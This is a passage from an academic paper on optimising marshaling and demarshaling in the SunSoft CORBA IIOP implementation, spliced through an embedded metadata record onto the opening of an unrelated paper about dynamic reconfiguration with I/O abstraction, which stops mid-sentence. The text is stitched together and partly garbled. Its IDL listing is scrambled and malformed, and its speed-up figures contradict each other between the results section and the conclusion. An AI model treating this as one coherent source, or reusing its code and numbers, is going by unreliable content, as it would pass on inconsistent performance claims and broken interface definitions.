1. *Avoiding duplication:* Whenever the cdr::decode is demarshaling a sequence of structs, it must retrieve the TypeCode and size of the element type. When the decoder invokes the TypeCode interpreter, the same information is retrieved once again. This duplication is wasteful and must be eliminated (while maintaining correctness).
To solve this problem, we used C++'s "default parameter" feature to pass the information from the decoder to the traverse method. This is an example of Principle 6, which recommends passing information between layers. To accomplish this, we modified the signature of the traverse method to use two additional void* parameters at the end. Each parameter has a default value of NULL, so it does not affect the existing implementation.
For the t.k.sequence case, the decoder passes a pointer to the element's TypeCode and a pointer to the size information via the additional parameters of method traverse. Inside the traverse logic for t.k.sequences, we check if the two parameters are non-NULL and retrieve the necessary information accordingly. Note that this approach is also reentrant, which is important since our IOIP implementation must run in multi-threaded applications.
2. *Avoid unnecessary function calls:* Whenever the TypeCode interpreter is passed a sequence of structs, it invokes the cdr::decode to demarshaling the struct. However, this method simply reinvokes the interpreter without processing the struct. This additional method call overhead is wasteful and unnecessary.
To handle this second problem, we inserted a special-case check inside the traverse method for t.k.sequences to see if the element type is a struct or an array. If it is, we invoke the traverse method directly to handle the element. Although this is still a recursive call, performance improves since the code for traverse is likely to remain in the instruction cache.
- **Optimization results:** The throughput measurements recorded after incorporating these optimizations are shown in Figure 14. Figures 15 and 16 illustrate the benefits of the optimizations from step 3 by comparing the throughput obtained for doubles and BinStructs, respectively, with those from the previous optimization steps.
The results illustrate that there is no change in the performance of any of the primitive types. This is expected since no wasteful (recursive) method call overhead is incurred for these types. However, for sending BinStructs, the throughput is now twice the performance of the previous results. This increase is primarily due to eliminating the overhead of the calc_nested.size_and_alignment method, which accounts for almost 30% of the runtime costs prior to these optimizations.
Table 7 depicts the profiling measurements for the receiver. The sender continues to spend the most of its execution time performing network write calls. The methods in the receiver that account for most of the execution time for doubles include traverse, decoder, and
3.2.6 Optimization Step 4: Eliminating Obvious Waste and Specializing Generic Methods
- **Problem: expensive no-ops for memory deallocation:**
The optimizations described in Section 3.2.5 improve performance for sending BinStructs. Table 7 reveals the overhead of the `deep_free` method is significant for primitive data types. This method is similar to the `decoder` method that traverses the `TypeCode` and deallocates dynamic memory. The `deep_free` method has the same type signature as the `decoder` method. Therefore, it can use the `traverse` method to traverse the data structure and deallocate memory.
Close scrutiny of the `deep_free` method indicates that memory must be freed for constructed data structures (such
as IDL sequences and structs). We observed that for sequences, if the element type is a primitive type, the deep_free method simply deallocates the buffer containing the sequence.
Instead of limiting itself to this simple logic, however, the deep_free method uses traverse to lookup the element type that comprises the IDL sequence. Then, for the entire length of the sequence, it invokes the deep_free method with the element's TypeCode. The deep_free method immediately determines that this is a primitive type and returns. However, this process is wasteful since it creates a large number of method calls that are essentially "no-ops."
- **Solution 1: eliminate obvious waste:** To optimize this, we changed the deletion strategy for sequences so that the element's TypeCode is checked first. If it is a primitive type, the traversal is not done and the memory is deallocated directly.
- **Solution 2: specialize generic methods:** In addition to eliminating obvious waste, we also optimized the traverse method by reducing the number of calls it made to method other than itself. The goal is to improve processor cache affinity. This improvement in the traverse method was achieved by incorporating the encoder, decoder, and deep_free logic in the traverse method itself.
- **Optimization results:** The throughput measurements for the fourth optimization step is shown in Figure 3.2.6. The throughput comparison for this case with previous cases is shown in Figures 18 and 19. These results indicate that this final optimization step improves the performance of the original IOP implementation by a factor of 1.7 times for doubles, 2.56 times for longs, 3.75 times for shorts, 5 times for chars/octets, and around 4.75 times for BinStructs.
Figure 15: Throughput Comparison for Doubles After Applying the Third Optimization (precomputing and adding redundant state)
Figure 17: Throughput After the Applying the Fourth Optimization (getting rid of waste)
Figure 16: Throughput Comparison for Structs After Applying the Third Optimization (precomputing and adding redundant state)
Figure 18: Throughput Comparison for Doubles After Applying the Fourth Optimization (getting rid of waste)
Tables 8 and 9 illustrate the remaining high cost sender-side and receiver-side methods, respectively. The tables indicate that for primitive types, the cost of writing to the network and reading from the network becomes the primary contributor to the run-time costs. For BinStructs, the TypeCode interpreter still remains the dominant factor — accounting for almost 92% of the receiver side run-time costs. To further reduce the overhead of the interpreter, we are applying more sophisticated compiler-based optimizations. These include using flow analysis to identify dependencies in the code. Having dealt with the dependencies, it would be possible to obtain an optimal ILP (Integrated Layer Processing) implementation of the interpreter. An ILP-based implementation will reduce the excessive data manipulation operations which is essential for RISC based architectures.
3.3 Maintaining CORBA Compliance and Interoperability
The optimizations presented in the previous sections are useful only to the extent that we maintain CORBA compliance and can interoperate with IIOP-based ORBs. This subsection presents the throughput results obtained for running the same experiment with Visigenic’s VisiBroker for C++ client and the SunSoft IIOP server. Figures 20 and 21 illustrate the throughput measurements for the original SunSoft IIOP server and our highly optimized implementation, respectively.
4 Related Work
This section describes results from existing work on protocol optimization based on one or more of the principles mentioned in Table 1. In addition, we discuss related work on CORBA performance measurements and presentation layer marshaling.
4.1 Related Work Based on Optimization Principles
[4] describes a technique called header prediction that predicts the message header of incoming TCP packets. This technique is based on the observation that many members in the header remaining constant between consecutive packets. This observation led to the creation of a template for the expected packet header. The optimizations reported in [4] are based on Principle 1, which optimizes for the expected case and Principle 3, which is precompute, if possible. We present
4.2 Related Work Based on CORBA Performance Measurements
[8, 9, 10] show that the performance of CORBA implementations is relatively poor, compared to that of low-level implementations using C/C++. The primary source of ORB-level overhead stems from marshaling and demarshaling. [8] measures the performance of the static invocation interface. [9] measures the performance of the dynamic invocation interface and the dynamic skeleton interface. [10] measures performance of CORBA implementations in terms of latency and support for very large number of objects. However, these results were restricted to measuring the performance of communication between homogeneous ORBs. These tests do not measure the run-time costs of interoperability between ORBS from different vendors. In addition, these papers do not provide solutions to reduce these overheads. In contrast, we have provided solutions that significantly improve performance by reducing marshaling/demarshaling overhead.
4.3 Related Work Based on Interpretive and Compiled Forms of Marshaling
[11] describes the tradeoffs of using compiled and interpreted marshaling schemes. Although compiled stubs are faster, they are also larger. In contrast, interpretive marshaling is slower, but smaller in size. [11] describes a hybrid scheme that combines compiled and interpretive marshaling to achieve better performance. This work was done in the context of the ASN.1/BER encoding [12].
According to the SunSoft IIOP implementors, interpretive marshaling is preferable since it decreases code size and increases the likelihood of remaining in the processor cache. Our measurements do not compare the SunSoft IIOP interpretive marshaling scheme with a compiled marshaling scheme. As explained in Section 5, we are currently implementing a CORBA IDL compiler that can generate compiled stubs and skeletons. Our goal is to generate efficient stubs and skeletons by extending optimizations provided in USC [16].
5 Concluding Remarks
This paper illustrates the benefits of applying principle-based optimizations [21] that improve the performance of the SunSoft CORBA Inter-ORB Protocol (IIOP) reference implementation. The principles that directed our optimizations included: (1) optimizing for the expected case, (2) eliminating obvious waste, (3) replacing general-purpose methods with efficient special-purpose ones, (4) precomputing values, if possible, (5) storing redundant state to speed up expensive operations, and (6) passing information between layers.
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed
structs over ATM networks. Our optimized implementation is now competitive with existing commercial ORBs [8, 10] using the static invocation interface (SII) and 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI) [9]. In addition, we show that our optimized implementation of IIOP interoparates seamlessly with Visigenic’s VisiBroker for C++ ORB which is a commercially available ORB.
In addition to our optimizations, we are currently enhancing the SunSoft IIOP implementation to form a complete high-performance ORB [18]. This involves extending the SunSoft CORBA IDL compiler to generate optimized stubs and skeletons from IDL interfaces. These generated stubs and skeletons will transform C++ methods into/from CORBA requests via our optimized IIOP implementation. In addition, we are incorporating an Object Adapter into our IIOP implementation that supports de-layered request demultiplexing. This ORB will be used to compare the impact of using compiled marshaling stubs and skeletons vs. the interpretive scheme currently implemented in SunSoft IIOP. We plan to measure the tradeoffs of using the two marshaling schemes to achieve an optimal hybrid solution [11].
References
A The CORBA General Inter-ORB Protocol and Internet Inter-ORB Protocol
This section describes the components in the CORBA General Inter-ORB Protocol (GIOP) and Internet Inter-ORB Protocol (IIOP) protocol in detail.
A.1 Common Data Representation (CDR)
The GIOP CDR defines a transfer syntax for transmitting OMG IDL data types across a network. The CDR definition maps
the OMG IDL data types from their native host format to a bi-canonical, low-level representation. The bi-canonical representation supports both the little-endian and the big-endian formats. The salient features of CDR are:
- **Variable byte ordering**: The sender encodes the data using its native byte-order. Special flag values in the encoded stream indicate the byte order used. Thus, only receivers with byte ordering different from the sender are required to perform byte swapping to retrieve correct binary values.
- **Aligned Types**: Primitive OMG IDL data types are aligned on their "natural" boundaries within GIOP messages, as shown in Table 10. Constructed data types (such as IDL sequence and struct) have no additional alignment restrictions beyond those of their primitive types i.e., the size and alignment of the constructed type will depend on the size and alignment of the primitives that make up constructed type.
- **Complete OMG IDL mapping**: CDR provides a mapping for all the OMG IDL data types, including transferable pseudo-objects such as TypeCodes. CORBA pseudo-objects are those entities that are neither CORBA primitive types nor constructed types. A client acquiring a reference to a pseudo-object cannot use DII to make calls to the methods described by the IDL interface of that pseudo-object. The DSI and DII interpreters use the TypeCode information passed to them by users of DSI and DII, respectively.
- **CDR Encapsulations**: A CDR encapsulation is a sequence of octets. Encapsulations are typically used to marshal parameters of the following types:
- **Complex TypeCodes** — see Table 11.
- **IIOP protocol profiles inside interoperable object references (IOR)** — A protocol profile provides information about the transport protocol that enables client applications to talk to the servers. In the IIOP profile (Figure 22), this information consists of the host name and port number on which the server is listening, and the object_key of the target object implemented by that server. An IOR (see Figure 23) represents a complete information about an object. This information includes the type it represents, the protocols it supports, whether it is null or not, and any ORB related services that are available.
### Table 10: Alignment for OMG Primitive Types in Bytes
<table>
<thead>
<tr>
<th>Type</th>
<th>Alignment</th>
</tr>
</thead>
<tbody>
<tr>
<td>char</td>
<td>1</td>
</tr>
<tr>
<td>octet</td>
<td>1</td>
</tr>
<tr>
<td>short</td>
<td>2</td>
</tr>
<tr>
<td>long</td>
<td>4</td>
</tr>
<tr>
<td>unsigned short</td>
<td>2</td>
</tr>
<tr>
<td>unsigned long</td>
<td>4</td>
</tr>
<tr>
<td>float</td>
<td>4</td>
</tr>
<tr>
<td>double</td>
<td>8</td>
</tr>
<tr>
<td>boolean</td>
<td>1</td>
</tr>
<tr>
<td>enum</td>
<td>4</td>
</tr>
</tbody>
</table>
### Table 11: TypeCode Enum Values, Parameter List Types, and Parameters
- **Service-specific contexts** — The COSS [14] specification defines a number of services such as the transaction service. For interoperability, it may be required to pass service-specific information via opaque parameters. This is achieved using the service-specific context.
The first byte of an encapsulation always denotes the byte-order used to create the encapsulation. Encapsulations can be nested inside of other encapsulations. Each encapsulation can use any byte-order, irrespective of its other encapsulations.
### A.2 GIOP Message Formats
The GIOP specification defines seven types of messages. Each message is assigned a unique value. The originator of a giop message can be a client and/or a server. Table 12 depicts the seven types of messages and the permissible originators of these messages.
A GIOP message begins with a GIOP header (Figure 24), followed by one of the message types (Figure 25), and finally the body of the message, if any.
A.3 GIOP Message Transport
The GIOP specification makes certain assumptions about the transport protocol that can be used to transfer GIOP messages. These assumptions are listed below.
- The transport mechanism must be connection-oriented;
- The transport protocol must be reliable;
- The transport data is a byte stream without message delimitations;
- The transport provides notification of disorderly connection loss;
- The transport's model of establishing a connection can be mapped onto a general connection model (such as TCP/IP).
Examples of transport protocols that meet these requirements are TCP/IP and OSI TP4.
A.4 Internet Inter-ORB Protocol (IIOP)
The IIOP is a specialized mapping of GIOP onto the TCP/IP protocols. ORBs that use IIOP can communicate with other ORBs that publish their TCP/IP addresses as interoperable object references (IORs). IIOP IOR profiles are shown in Figure 22. Figure 23 shows the format of an IOR. When IIOP is used, the profile data member of the TaggedProfile structure holds the profile data of IIOP shown in Figure 22.
B TTCP IDL description
The following CORBA IDL interface was used in our experiments to measure the throughput of SunSoft IIOP:
```idl
typedef sequence<BinStruct> StructSeq;
// Methods to send various data type sequences.
oneway void sendShortSeq (in ShortSeq ttcp_seq);
oneway void sendLongSeq (in LongSeq ttcp_seq);
oneway void sendDoubleSeq (in DoubleSeq ttcp_seq);
oneway void sendCharSeq (in CharSeq ttcp_seq);
oneway void sendOctetSeq (in OctetSeq ttcp_seq);
oneway void sendStructSeq (in StructSeq ttcp_seq);
oneway void start_timer ();
oneway void stop_timer ();
```
```idl
// BinStruct is 32 bytes (including padding).
struct BinStruct
{
short s; char c; long l;
octet o; double d; octet pad[8]
};
```
```idl```
// Richly typed data.
interface tcp_throughput
{
typedef sequence<short> ShortSeq;
typedef sequence<long> LongSeq;
typedef sequence<double> DoubleSeq;
typedef sequence<char> CharSeq;
typedef sequence<octet> OctetSeq;
}
|
{"Source-Url": "http://openscholarship.wustl.edu/cgi/viewcontent.cgi?article=1427&context=cse_research", "len_cl100k_base": 15335, "olmocr-version": "0.1.53", "pdf-total-pages": 24, "total-fallback-pages": 0, "total-input-tokens": 28921, "total-output-tokens": 16924, "length": "2e13", "weborganizer": {"__label__adult": 0.0003669261932373047, "__label__art_design": 0.0002923011779785156, "__label__crime_law": 0.0003237724304199219, "__label__education_jobs": 0.0005807876586914062, "__label__entertainment": 0.00016033649444580078, "__label__fashion_beauty": 0.00015473365783691406, "__label__finance_business": 0.00034236907958984375, "__label__food_dining": 0.0003304481506347656, "__label__games": 0.0008449554443359375, "__label__hardware": 0.0033435821533203125, "__label__health": 0.00046706199645996094, "__label__history": 0.0004267692565917969, "__label__home_hobbies": 7.164478302001953e-05, "__label__industrial": 0.0005903244018554688, "__label__literature": 0.0003190040588378906, "__label__politics": 0.00030159950256347656, "__label__religion": 0.0005593299865722656, "__label__science_tech": 0.1630859375, "__label__social_life": 9.310245513916016e-05, "__label__software": 0.026123046875, "__label__software_dev": 0.7998046875, "__label__sports_fitness": 0.0003209114074707031, "__label__transportation": 0.0007376670837402344, "__label__travel": 0.0002529621124267578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 68663, 0.05846]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 68663, 0.42564]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 68663, 0.86508]], "google_gemma-3-12b-it_contains_pii": [[0, 1920, false], [1920, 4144, null], [4144, 4399, null], [4399, 4399, null], [4399, 9019, null], [9019, 13730, null], [13730, 18417, null], [18417, 22594, null], [22594, 27165, null], [27165, 29257, null], [29257, 31144, null], [31144, 35632, null], [35632, 40992, null], [40992, 45146, null], [45146, 49549, null], [49549, 50281, null], [50281, 52031, null], [52031, 52479, null], [52479, 54666, null], [54666, 57404, null], [57404, 62873, null], [62873, 66619, null], [66619, 67690, null], [67690, 68663, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1920, true], [1920, 4144, null], [4144, 4399, null], [4399, 4399, null], [4399, 9019, null], [9019, 13730, null], [13730, 18417, null], [18417, 22594, null], [22594, 27165, null], [27165, 29257, null], [29257, 31144, null], [31144, 35632, null], [35632, 40992, null], [40992, 45146, null], [45146, 49549, null], [49549, 50281, null], [50281, 52031, null], [52031, 52479, null], [52479, 54666, null], [54666, 57404, null], [57404, 62873, null], [62873, 66619, null], [66619, 67690, null], [67690, 68663, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 68663, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 68663, null]], "pdf_page_numbers": [[0, 1920, 1], [1920, 4144, 2], [4144, 4399, 3], [4399, 4399, 4], [4399, 9019, 5], [9019, 13730, 6], [13730, 18417, 7], [18417, 22594, 8], [22594, 27165, 9], [27165, 29257, 10], [29257, 31144, 11], [31144, 35632, 12], [35632, 40992, 13], [40992, 45146, 14], [45146, 49549, 15], [49549, 50281, 16], [50281, 52031, 17], [52031, 52479, 18], [52479, 54666, 19], [54666, 57404, 20], [57404, 62873, 21], [62873, 66619, 22], [66619, 67690, 23], [67690, 68663, 24]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 68663, 0.21143]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
355e5da8fbc7649117bd0fb94891e8e8b0bda680
|
Dynamic Reconfiguration with I/O Abstraction
Authors: Bala Swaminathan and Kenneth J. Goldman
Dynamic reconfiguration is explored in the context of I/O abstraction, a new programming model that defines the communication structure of a system in terms of connections among well-defined data interfaces for the modules in the system. The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, help simplify the reconfiguration strategy. Both logical and physical reconfiguration are discussed, with an emphasis on a new module migration mechanism that (1) takes advantage of the underlying I/O abstraction model, (2) avoids the expense and complication of state extraction techniques, (3) minimizes the amount of code required for migration and confines that code to a separate section of the program, and (4) is designed to permit migration across heterogeneous hosts and to allow replacement of one implementation by another, even if the new implementation is written in another programming language. The flexibility of the migration mechanism is illustrated by presenting three different paradigms for constructing reconfiguration modules that are supported by this new mechanism. A uniform... Read complete abstract on page 2.
Follow this and additional works at: http://openscholarship.wustl.edu/cse_research
Part of the Computer Engineering Commons, and the Computer Sciences Commons
Recommended Citation
http://openscholarship.wustl.edu/cse_research/309
Dynamic Reconfiguration with I/O Abstraction
**Complete Abstract:**
Dynamic reconfiguration is explored in the context of I/O abstraction, a new programming model that defines the communication structure of a system in terms of connections among well-defined data interfaces for the modules in the system. The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, help simplify the reconfiguration strategy. Both logical and physical reconfiguration are discussed, with an emphasis on a new module migration mechanism that (1) takes advantage of the underlying I/O abstraction model, (2) avoids the expense and complication of state extraction techniques, (3) minimizes the amount of code required for migration and confines that code to a separate section of the program, and (4) is designed to permit migration across heterogeneous hosts and to allow replacement of one implementation by another, even if the new implementation is written in another programming language. The flexibility of the migration mechanism is illustrated by presenting three different paradigms for constructing reconfiguration modules that are supported by this new mechanism. A uniform specification mechanism is provided for both logical and physical reconfiguration.
Dynamic Reconfiguration with I/O Abstraction
Bala Swaminathan
Kenneth J. Goldman
WUCS-93-21
August 20 1993
Revised March 17 1995
Department of Computer Science
Washington University
Campus Box 1045
One Brookings Drive
Saint Louis, MO 63130–4899
Dynamic Reconfiguration with I/O Abstraction
Bala Swaminathan
bs@cs.wustl.edu
Department of Computer Science
Washington University
St. Louis, MO 63130
Kenneth J. Goldman*
kjg@cs.wustl.edu
Department of Computer Science
Washington University
St. Louis, MO 63130
March 17, 1995
Abstract
Dynamic reconfiguration is explored in the context of I/O abstraction, a new programming model that defines the communication structure of a system in terms of connections among well-defined data interfaces for the modules in the system. The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, help simplify the reconfiguration strategy. Both logical and physical reconfiguration are discussed, with an emphasis on a new module migration mechanism that (1) takes advantage of the underlying I/O abstraction model, (2) avoids the expense and complication of state extraction techniques, (3) minimizes the amount of code required for migration and confines that code to a separate section of the program, and (4) is designed to permit migration across heterogeneous hosts and to allow replacement of one implementation by another, even if the new implementation is written in another programming language. The flexibility of the migration mechanism is illustrated by presenting three different paradigms for constructing reconfigurable modules that are supported by this new mechanism. A uniform specification mechanism is provided for both logical and physical reconfiguration.
Keywords: heterogeneous systems, dynamic reconfiguration, distributed systems, process migration
1 Introduction
The configuration of a distributed system consists of three parts, a logical configuration that defines the set of modules and their logical communication channels, a physical configuration that assigns
modules to processors and assigns logical communication channels to physical paths in the network, and a *hardware configuration* that consists of a set of processors and physical communication links. *Dynamic configuration* is the act of modifying the configuration of a system while the modules are executing and interacting.
Logical reconfiguration may involve adding or removing modules, adding or removing logical communication channels, replacing one module by another, or redirecting communication. Physical reconfiguration may involve reassigning a module to a different processor (module migration) or assigning the communication to a different path in the network. Hardware reconfiguration may involve adding or removing processors, or adding or removing communication links. Reconfiguration is a planned activity, and does not include unplanned changes to the system due to hardware or software failures. However, some of the techniques for managing dynamic reconfiguration can be useful in building fault-tolerant systems.
Goscinski [6] points to several important benefits of dynamic reconfiguration. For example, if a new efficient algorithm is developed for a module that is part of a long-running or continuously-available application, dynamic logical reconfiguration makes it possible to replace the original module with the efficient version without having to start over or interrupt service. Dynamic physical reconfiguration is useful for migrating modules from one machine to another in order to perform routine maintenance or balance load. Dynamic physical reconfiguration can also be used to minimize computation time or message traffic of some applications by migrating processes to machines with special-purpose hardware or specialized databases at times when those processes have specific computational or data requirements. Furthermore, when advance notice is available about system shutdown, active processes in the machine can be relocated.
Dynamic reconfiguration must be handled carefully in order to preserve the logical consistency of the system. Changes to the logical configuration should appear atomic. For example, if a module A is replaced by a module B, no module should receive a message originating at A after receiving a message from B. Similarly, changes to the physical configuration should not alter the logical execution (results) of the executing system. For example, if a module on processor 1 is reassigned to processor 2, none of the module’s output should be lost or duplicated as a result of the migration. These problems imply certain requirements for distributed environments that support reconfiguration. Hofmeister and Purtilo put forth the following requirements for reconfiguration in
heterogeneous distributed systems [8]:
(R1) communication across heterogeneous hosts
(R2) current configuration is accessible
(R3) bindings (interconnections) are not compiled into modules
(R4) no covert communication among modules
(R5) ability to add/remove modules and bindings
(R6) access to messages in transit
(R7) mechanism for synchronizing activities
(R8) access to module's state information
Item (R1) is necessary unless the system is homogeneous. Items (R2) through (R7) are necessary for both logical and physical reconfiguration. Item (R8) is necessary only for module replacement and physical reconfiguration.
Various strategies for different kinds of reconfiguration have been studied. For example, a Durra [1, 2] application can evolve during execution by dynamically removing processes and their ports and instantiating new processes and their ports without affecting other processes. Darwin [10, 14, 12], a generalization of Conic [11, 12], supports logical reconfiguration where the programmer adds code that adapts program modules to participate in reconfiguration. Both Durra and Darwin [2, 10] allow only adding or deleting processes and interconnections between them. PROFIT [9], a recent language that provides a mixture of RPC and data sharing for communication, permits dynamic binding of slots in special cases [7]. Argus [13] supports reconfiguration with two phase locking over atomic objects and version management recovery techniques. Some systems support physical reconfiguration, but support for module migration often has relied upon complicated and expensive techniques for the extraction of the module's state information [16]. Platforms like Polylith [15] support moving a process to another machine while the application is executing. In Polylith, configuration is expressed in terms of a set of procedure call bindings. The programmer specifies "reconfiguration points," that are used to automatically prepare a process
\footnote{This set of requirements does not appear in their paper, but was part of the conference presentation.}
to participate during reconfiguration and special techniques are used to capture internal program state in order to accomplish the migration [8].
In this paper, we consider logical and physical dynamic reconfiguration in heterogeneous distributed systems whose modules are written using a new programming model called I/O abstraction [5]. Briefly, I/O abstraction is the view that each software module in a system has a set of data structures that may be externally observed and/or manipulated. This set of data structures forms the external interface (or presentation) of the module. Each module is written independently and modules are then configured by establishing logical connections among the data structures in their presentations. As published data structures are updated, I/O occurs implicitly ("under the covers") according to the logical connections established in the configuration. I/O abstraction is similar to the dataflow model, except that I/O abstraction modules can produce results autonomously, in addition to being able to react to input events, and communication can be bidirectional.
I/O abstraction is designed to simplify applications programming by treating communication as a high-level relationship between the states of communicating modules and leaving program I/O as an implicit activity. Since low level input and output activities are hidden, programmers need not be concerned with explicitly initiating communication activities, such as sending and receiving messages, and therefore need not be concerned with the particular communication primitives provided by the operating system or the network interface. The connection-oriented view of I/O abstraction also permits continuous media communication (such as audio and video) to be handled with the same high-level communication model used for discrete data.
Two properties make I/O abstraction particularly well-suited for supporting dynamic reconfiguration. The first of these properties is that I/O abstraction achieves a separation of computation from communication. Rather than writing applications programs that are peppered with explicit I/O requests, the applications programmer is concerned only with the details of the computation, and the communication is declared separately in terms of high-level relationships among the state components of different modules. Thus, the logical configuration is known to the system and can be modified independently, without involvement of the software modules. This is certainly a requirement for logical reconfiguration, but is also a necessity for physical reconfiguration (see R2–R5 above).
The second property of I/O abstraction that facilitates reconfiguration is that it exposes certain
state information (see R8) in the presentation of each module. This state information is accessible to the run-time system at all times. This ability to access state distinguishes I/O abstraction from many other programming models that provide access to configuration information. Because I/O abstraction already exposes certain local state information for each module, we are able to avoid some of the problems that have plagued other systems and accomplish physical reconfiguration in a straightforward and efficient manner.
In this paper, we are interested in the problem of semantic migration, in which the correctness of the observable behavior of the application is preserved, as opposed to state migration, in which the address space of the migrating module is transferred to the destination. That is, our point of view is that of the external environment as opposed to the internal structure of the migrated process. Advantages of semantic migration (in I/O abstraction) include (1) migrating without expensive state extraction, (2) migration across heterogeneous hosts, (3) "take over" by modules with the same presentation written in other programming languages, and (4) minimal (typically one line) change to the program code. In some kinds of applications, however, additional code may be need in the "migratable" program, or intermediate results from computation at the source processor may be lost during migration and must be recomputed.
The remainder of this paper is organized as follows. In Section 2, we describe The Programmers' Playground, a software library and run-time system we have designed to support the I/O abstraction programming model. This is followed, in Section 3 by a discussion of reconfiguration in Playground. The emphasis is on a detailed description of a module migration mechanism for supporting physical reconfiguration that takes advantage of the properties of I/O abstraction. Section 4 illustrates the flexibility of the process migration mechanism by describing three different paradigms for constructing relocatable modules that are compatible with our migration mechanism. The implementation of module migration in The Programmers' Playground is discussed in Section 5. We conclude in Section 6 with a discussion and possible directions for future research.
2 The Programmers' Playground
The Programmers' Playground is a software library and run-time system that supports I/O abstraction in terms of three fundamental concepts: data, control, and connections. It is not a
programming language, but rather a coordination language [4] designed to work with multiple
computation languages in combination. We discuss data, control, and connections, and then de-
scribe a Playground implementation for C++ on the Solaris operating system.
2.1 Data
Data, the units of a module's state, may be private to a module or they may be published for
access by other modules. Playground provides a library of data types for declaring publishable
data. These include base types (integer, real, etc.), tuples, and aggregates (sets, arrays, etc.) of
homogeneous elements. Aggregates and tuples may be arbitrarily nested and programmers may
define aggregate types in addition to those provided in the Playground library.
Each Playground module has a presentation that consists of the set of data structures that have
been published by that module. The set of presentation entries may change dynamically as the
module runs. However, for the purposes of reconfiguration, we will assume that the presentation is
fixed at initialization (although the values of the data structures in the presentation may, of course,
change). Documentation and protection information may be associated with each published data
item in order to assist in the configuration process and protect against unauthorized use. Data
type information is automatically associated with each presentation entry so that type checking
may occur at (re)configuration time.
It is helpful to think about a Playground module as interacting with an environment, an external
collection of modules and users that are unknown to the module but may read and modify the data
items in its presentation (as permitted by the protection information defined for the data items). A
behavior of a module is a sequence of values held by the data items in its presentation. A module's
behavior is the view that the environment has of the module.
The notion of behavior is useful for defining the correctness criteria for our reconfiguration
algorithm. Let $B$ be the set of all allowable behaviors of a module $M$ with presentation $P$, and
suppose that $M$ is involved in a reconfiguration (logical or physical). If $P_v$ is the value of $P$ just
before the reconfiguration, then $M$'s behavior after the reconfiguration should be a suffix $B'$ of an
element of $B$ such that $B'$ begins with the presentation value $P_v$. Moreover, if the reconfiguration
is only a physical reconfiguration, then $M$'s behavior should not be distinguishable from a possible
behavior in an identical system in which the reconfiguration did not occur.
2.2 Control
The control portion of a Playground module is divided into two components: *active control* and *reactive control*. The active control carries out the ongoing computation of the module, while the reactive control carries out activities in response to input from the environment. For example, in a simulation module, the active control would be responsible for the main loop that performs the computation for each event in the simulation, while the reactive control would handle changes in externally controllable parameters of the simulation.
The active control component of a Playground module is the control defined by the “mainline” portion of the module. To define the reactive control, one associates with each data item an activity to be performed when the value of that data item is changed by the environment. As a simple example, one might associate with data item $x$ an enqueue operation for some “update queue” $q$. With each external update to $x$, the new value of $x$ would be enqueued into $q$ for later processing.
2.3 Connections
Relationships between the data items in the presentation of different modules are created by establishing *connections* between those data items. The set of connections among published data items defines the pattern of communication among the corresponding modules. Connections are established separately from the definitions of module programs. One designs Playground modules with a local orientation, and later connects them together to form the logical configuration of the system. In this way, each module need not concern itself with the structure of its environment, but only with the behaviors exhibited at its presentation.
Playground supports two kinds of connections, *simple connections* and *element-to-aggregate* connections. A simple connection relates two data items of the same type. For example, an integer $x$ in module $A$ might be connected by a simple connection to integer $y$ in module $B$. If the simple connection is unidirectional, then the semantics of the connection is that whenever $A$ changes the value of $x$, item $y$ in module $B$ is updated with that value as well. If the simple connection is bidirectional, then an update of $y$’s value by module $B$ would also result in a corresponding update to $x$ in $A$. Arbitrary *fan-out* and *fan-in* are permitted, meaning that multiple simple connections
\footnote{Connections are sometimes called *logical connections* to contrast them with *physical connections* such as links in a computer network.}
may emanate from or converge to a given data item. For example, the integer \( z \) in the above example might also be connected to integer \( z \) in module \( C \). Then, whenever the value of \( z \) is changed, \( y \) and \( z \) are both updated. Communication is asynchronous and pairwise FIFO.
Recall that an aggregate data type is an organization of a homogeneous collection of elements, such as a set of integers or an array of tuples. The element type of an aggregate is the data type of its elements. For example, if \( s \) is a set of integers, the element type of \( s \) is "integer." An element-to-aggregate connection results when a connection is formed between a data item of type \( T \) and an aggregate data item with element type \( T \). For example, a client/server application could be constructed by having the server publish a data structure of type \( \text{set}(T) \) and having each client publish a data structure of type \( T \). If an element-to-aggregate connection is created between each client's type \( T \) data structure and the server's \( \text{set}(T) \) data structure, then the server program will see a set of client data structures, and each client may interact with the server through its individual element. Details on element-to-aggregate connections may be found elsewhere [5].
2.4 Playground Implementation
A logical overview of a Playground system is shown in Figure 1. A running module consists of three components: the application process, the protocol process automatically launched with the application, and a block of shared memory, managed by the veneer, that is used by both the application process and the protocol. The veneer is a software layer between the application
and the protocol that defines the Playground data types and maintains locking information for
c synchrony control, as well as the documentation and protection information published with each
data structure. Reactive control information is also registered in the veneer.
The application publishes a set of data structures as its presentation. These data structures are
held in the shared memory so that they are accessible to both the application and the protocol.
The protocol runs concurrently with the application and interacts with the operating system in
